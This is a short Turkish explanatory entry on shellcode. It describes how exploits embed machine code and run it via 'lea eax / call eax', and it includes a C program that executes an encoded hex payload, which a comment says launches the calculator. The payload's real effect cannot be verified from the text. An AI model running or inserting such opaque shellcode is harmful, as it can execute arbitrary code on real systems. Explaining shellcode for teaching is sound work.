shellcode

genelde assembly ile yazılarak daha sonra hex dump seklinde exploit içerisine entegre edilir. sisteme eriştikten sonra çalıştırılacak koddur.

lea eax,[shellcode]
call eax

çalışma prensibi yukarıda ki gibidir. exploit içerisinde ki shellcode efektif adresi eax kaydedicisine atanır ve sonrasında call ile bu adres çağrılır.

aslen makine kodudur bir sürü ismi vardır,opcode hex code vs vs...
genelde hack amaçlı kullanılır buffer overflow saldırılarında karşı makineye zorla çalıştırılır.
işte bir örnek;

#include <stdio.h>
#include <conio.h>
#include <Windows.h>
char shellCode[] = // windows 7 -Win Xp uyumlu hesap makinesi çalıştıran shellcode
"\xbf\x83\xaf\xc1\xb7\xdb\xca\xd9\x74\x24\xf4\x31\xc9\xb1\x32"
"\x58\x31\x78\x12\x03\x78\x12\x83\x6b\x53\x23\x42\x97\x44\x2d"
"\xad\x67\x95\x4e\x27\x82\xa4\x5c\x53\xc7\x95\x50\x17\x85\x15"
"\x1a\x75\x3d\xad\x6e\x52\x32\x06\xc4\x84\x7d\x97\xe8\x08\xd1"
"\x5b\x6a\xf5\x2b\x88\x4c\xc4\xe4\xdd\x8d\x01\x18\x2d\xdf\xda"
"\x57\x9c\xf0\x6f\x25\x1d\xf0\xbf\x22\x1d\x8a\xba\xf4\xea\x20"
"\xc4\x24\x42\x3e\x8e\xdc\xe8\x18\x2f\xdd\x3d\x7b\x13\x94\x4a"
"\x48\xe7\x27\x9b\x80\x08\x16\xe3\x4f\x37\x97\xee\x8e\x7f\x1f"
"\x11\xe5\x8b\x5c\xac\xfe\x4f\x1f\x6a\x8a\x4d\x87\xf9\x2c\xb6"
"\x36\x2d\xaa\x3d\x34\x9a\xb8\x1a\x58\x1d\x6c\x11\x64\x96\x93"
"\xf6\xed\xec\xb7\xd2\xb6\xb7\xd6\x43\x12\x19\xe6\x94\xfa\xc6"
"\x42\xde\xe8\x13\xf4\xbd\x66\xe5\x74\xb8\xcf\xe5\x86\xc3\x7f"
"\x8e\xb7\x48\x10\xc9\x47\x9b\x55\x25\x02\x86\xff\xae\xcb\x52"
"\x42\xb3\xeb\x88\x80\xca\x6f\x39\x78\x29\x6f\x48\x7d\x75\x37"
"\xa0\x0f\xe6\xd2\xc6\xbc\x07\xf7\xa4\x23\x94\x9b\x2a";

int main()

{
_asm

{
lea eax,[shellCode] // shell code adresini eax registerine aktar
call eax // kodları çalıştır

}
}